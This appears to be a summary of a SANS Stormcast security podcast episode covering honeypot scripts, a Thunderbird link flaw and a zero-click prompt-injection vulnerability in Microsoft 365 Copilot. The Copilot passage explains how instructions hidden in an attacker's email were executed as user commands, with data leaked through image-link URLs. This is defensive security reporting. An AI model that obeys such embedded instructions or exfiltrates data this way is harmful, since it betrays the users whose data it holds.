SANS Internet Storm Center's Stormcast: June 13, 2025 Edition

In this June 13, 2025 edition of the SANS Internet Storm Center's Stormcast, Johannes Ullrich welcomes us from Jacksonville, Florida. He begins by presenting a journal written by William Constantino, an intern who created scripts to summarize data from the DShield honeypot. Ullrich emphasizes the importance of not just using these scripts, but also understanding how they are created and how their ideas can be applied to other use cases. He highlights the educational value of script creation, not only for learning to script but also for better understanding data and extracting useful artifacts. Next, Ullrich discusses a zero-click vulnerability in Microsoft 365 Copilot, a language model that integrates local data to answer user questions. The vulnerability lies in Copilot's difficulty in distinguishing instructions found in documents from those sent by the user. An attacker can send an email containing a command for Copilot, which executes it thinking it comes from the user. Data exfiltration then occurs via image links inserted in the response, where part of the URL contains the exfiltrated data. Although this flaw has been fixed by Microsoft, Ullrich notes that similar issues could exist in other systems. Ullrich also mentions a vulnerability in Thunderbird, classified as medium but potentially more dangerous in his opinion. This vulnerability allows "mailbox://" links to trigger unsolicited downloads of documents, including malicious PDFs or SMB connections, leading to credential leaks. He stresses the importance of updating Thunderbird to protect against this threat. In conclusion, Ullrich reminds listeners that there will be no podcast on the following Wednesday and Thursday due to personal travel, but the Monday, Tuesday, and Friday shows will air as usual. He encourages listeners to send feedback and leave positive reviews on their preferred podcast platform.